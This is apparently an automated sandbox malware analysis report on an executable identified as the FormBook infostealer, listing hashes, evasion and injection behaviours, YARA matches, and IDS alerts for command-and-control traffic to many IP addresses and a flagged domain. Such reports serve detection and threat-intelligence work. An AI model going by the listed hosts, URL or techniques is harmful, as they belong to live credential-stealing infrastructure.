Edit tour

Windows Analysis Report
MACHINE SPECIFICATIONS.exe

Overview

General Information

Sample name:	MACHINE SPECIFICATIONS.exe
Analysis ID:	1589904
MD5:	0821050b53dd0b7df1bdfb5239b0df48
SHA1:	6473c5ca92d00908e32978efc2a3a612db228dfe
SHA256:	cea3caf646f24876d9a4ad1e9c2501660f85b804c0931e9ae520f4c6841f21b3
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64native

MACHINE SPECIFICATIONS.exe (PID: 8548 cmdline: "C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe" MD5: 0821050B53DD0B7DF1BDFB5239B0DF48)

AddInProcess32.exe (PID: 8564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

RAVCpl64.exe (PID: 5320 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)

cmdkey.exe (PID: 9064 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)

firefox.exe (PID: 9172 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.110844567942.00000000034C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.107285059805.00000000013C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.110844494408.0000000003470000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T10:21:10.784518+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49770	194.9.94.86	80	TCP
2025-01-13T10:21:34.260733+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49774	45.56.79.23	80	TCP
2025-01-13T10:21:48.457776+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49778	104.21.16.1	80	TCP
2025-01-13T10:22:01.991542+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49782	199.192.21.169	80	TCP
2025-01-13T10:22:25.411305+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49786	47.83.1.90	80	TCP
2025-01-13T10:22:39.642392+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49790	13.248.169.48	80	TCP
2025-01-13T10:22:54.776354+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49794	160.25.166.123	80	TCP
2025-01-13T10:23:08.002062+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49798	172.67.132.227	80	TCP
2025-01-13T10:23:30.407723+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49802	136.243.64.147	80	TCP
2025-01-13T10:23:50.594776+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49806	202.95.11.110	80	TCP
2025-01-13T10:24:05.991065+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49810	13.248.169.48	80	TCP
2025-01-13T10:24:19.758752+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49814	103.106.67.112	80	TCP
2025-01-13T10:24:33.102008+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49818	104.21.112.1	80	TCP
2025-01-13T10:24:48.097466+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49822	47.83.1.90	80	TCP
2025-01-13T10:24:56.596425+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49823	194.9.94.86	80	TCP
2025-01-13T10:25:09.838208+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49827	45.56.79.23	80	TCP
2025-01-13T10:25:23.381614+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49831	104.21.16.1	80	TCP
2025-01-13T10:25:36.827596+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49835	199.192.21.169	80	TCP
2025-01-13T10:25:59.940054+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49839	47.83.1.90	80	TCP
2025-01-13T10:26:14.065763+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49843	13.248.169.48	80	TCP
2025-01-13T10:26:28.457325+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49847	160.25.166.123	80	TCP
2025-01-13T10:26:41.561139+0100	2855465	1	A Network Trojan was detected	192.168.11.20	49851	172.67.132.227	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T10:19:54.471695+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49793	160.25.166.123	80	TCP
2025-01-13T10:21:26.293640+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49771	45.56.79.23	80	TCP
2025-01-13T10:21:28.950307+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49772	45.56.79.23	80	TCP
2025-01-13T10:21:31.607688+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49773	45.56.79.23	80	TCP
2025-01-13T10:21:40.593848+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49775	104.21.16.1	80	TCP
2025-01-13T10:21:43.225878+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49776	104.21.16.1	80	TCP
2025-01-13T10:21:45.844950+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49777	104.21.16.1	80	TCP
2025-01-13T10:21:53.931273+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49779	199.192.21.169	80	TCP
2025-01-13T10:21:56.615001+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49780	199.192.21.169	80	TCP
2025-01-13T10:21:59.309282+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49781	199.192.21.169	80	TCP
2025-01-13T10:22:16.862551+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49783	47.83.1.90	80	TCP
2025-01-13T10:22:19.705027+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49784	47.83.1.90	80	TCP
2025-01-13T10:22:22.561507+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49785	47.83.1.90	80	TCP
2025-01-13T10:22:31.750087+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49787	13.248.169.48	80	TCP
2025-01-13T10:22:34.379787+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49788	13.248.169.48	80	TCP
2025-01-13T10:22:37.016801+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49789	13.248.169.48	80	TCP
2025-01-13T10:22:46.117946+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49791	160.25.166.123	80	TCP
2025-01-13T10:22:48.986719+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49792	160.25.166.123	80	TCP
2025-01-13T10:23:00.124357+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49795	172.67.132.227	80	TCP
2025-01-13T10:23:02.754208+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49796	172.67.132.227	80	TCP
2025-01-13T10:23:05.372842+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49797	172.67.132.227	80	TCP
2025-01-13T10:23:22.252180+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49799	136.243.64.147	80	TCP
2025-01-13T10:23:24.972634+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49800	136.243.64.147	80	TCP
2025-01-13T10:23:27.691749+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49801	136.243.64.147	80	TCP
2025-01-13T10:23:41.712888+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49803	202.95.11.110	80	TCP
2025-01-13T10:23:44.565061+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49804	202.95.11.110	80	TCP
2025-01-13T10:23:47.406182+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49805	202.95.11.110	80	TCP
2025-01-13T10:23:56.084219+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49807	13.248.169.48	80	TCP
2025-01-13T10:23:58.715932+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49808	13.248.169.48	80	TCP
2025-01-13T10:24:02.353713+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49809	13.248.169.48	80	TCP
2025-01-13T10:24:11.690682+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49811	103.106.67.112	80	TCP
2025-01-13T10:24:14.386534+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49812	103.106.67.112	80	TCP
2025-01-13T10:24:17.070141+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49813	103.106.67.112	80	TCP
2025-01-13T10:24:25.243442+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49815	104.21.112.1	80	TCP
2025-01-13T10:24:27.870637+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49816	104.21.112.1	80	TCP
2025-01-13T10:24:30.543791+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49817	104.21.112.1	80	TCP
2025-01-13T10:24:39.569082+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49819	47.83.1.90	80	TCP
2025-01-13T10:24:42.413395+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49820	47.83.1.90	80	TCP
2025-01-13T10:24:45.232871+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49821	47.83.1.90	80	TCP
2025-01-13T10:25:01.872669+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49824	45.56.79.23	80	TCP
2025-01-13T10:25:04.528707+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49825	45.56.79.23	80	TCP
2025-01-13T10:25:07.184698+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49826	45.56.79.23	80	TCP
2025-01-13T10:25:15.532314+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49828	104.21.16.1	80	TCP
2025-01-13T10:25:18.147768+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49829	104.21.16.1	80	TCP
2025-01-13T10:25:20.776827+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49830	104.21.16.1	80	TCP
2025-01-13T10:25:28.747758+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49832	199.192.21.169	80	TCP
2025-01-13T10:25:31.442283+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49833	199.192.21.169	80	TCP
2025-01-13T10:25:34.145976+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49834	199.192.21.169	80	TCP
2025-01-13T10:25:51.371208+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49836	47.83.1.90	80	TCP
2025-01-13T10:25:54.199057+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49837	47.83.1.90	80	TCP
2025-01-13T10:25:57.044951+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49838	47.83.1.90	80	TCP
2025-01-13T10:26:06.170167+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49840	13.248.169.48	80	TCP
2025-01-13T10:26:08.802085+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49841	13.248.169.48	80	TCP
2025-01-13T10:26:11.425403+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49842	13.248.169.48	80	TCP
2025-01-13T10:26:19.804116+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49844	160.25.166.123	80	TCP
2025-01-13T10:26:22.686466+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49845	160.25.166.123	80	TCP
2025-01-13T10:26:25.566976+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49846	160.25.166.123	80	TCP
2025-01-13T10:26:33.689700+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49848	172.67.132.227	80	TCP
2025-01-13T10:26:36.317142+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49849	172.67.132.227	80	TCP
2025-01-13T10:26:38.938644+0100	2855464	1	A Network Trojan was detected	192.168.11.20	49850	172.67.132.227	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.furrcali.xyz/k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&v1GdZ=vUN3	Avira URL Cloud: Label: malware
Source: http://www.furrcali.xyz/k29t/	Avira URL Cloud: Label: malware
Source: https://www.furrcali.xyz/k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: MACHINE SPECIFICATIONS.exe	ReversingLabs: Detection: 47%
Source: MACHINE SPECIFICATIONS.exe	Virustotal: Detection: 33%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.110844567942.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.107285059805.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.110844494408.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: MACHINE SPECIFICATIONS.exe

Joe Sandbox ML: detected

Source: MACHINE SPECIFICATIONS.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: AddInProcess32.pdb source: RAVCpl64.exe, 00000003.00000002.111799235023.000000000711C000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110843266469.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000003D3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000C7DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: cmdkey.pdbGCTL source: AddInProcess32.exe, 00000001.00000002.107284346063.0000000001008000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107287328226.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107283833885.0000000003308000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107287328226.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107283833885.0000000003308000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmdkey.pdb source: AddInProcess32.exe, 00000001.00000002.107284346063.0000000001008000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: RAVCpl64.exe, 00000003.00000002.111799235023.000000000711C000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110843266469.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000003D3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000C7DC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38BDD04 FindFirstFileExW,		0_2_00007FF6D38BDD04
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38BDE88 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_00007FF6D38BDE88

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 4x nop then mov ebx, 00000004h	3_2_008594E8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_039B04E8
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_0000019FCC5774E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49790 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49806 -> 202.95.11.110:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49774 -> 45.56.79.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49825 -> 45.56.79.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 202.95.11.110:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49770 -> 194.9.94.86:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 45.56.79.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 45.56.79.23:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49843 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49842 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49778 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 45.56.79.23:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49837 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49802 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49836 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49810 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49826 -> 45.56.79.23:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49782 -> 199.192.21.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49839 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49786 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49838 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49798 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49794 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49848 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49840 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49828 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 202.95.11.110:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49822 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49831 -> 104.21.16.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49851 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 202.95.11.110:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49849 -> 172.67.132.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49815 -> 104.21.112.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49845 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49846 -> 160.25.166.123:80
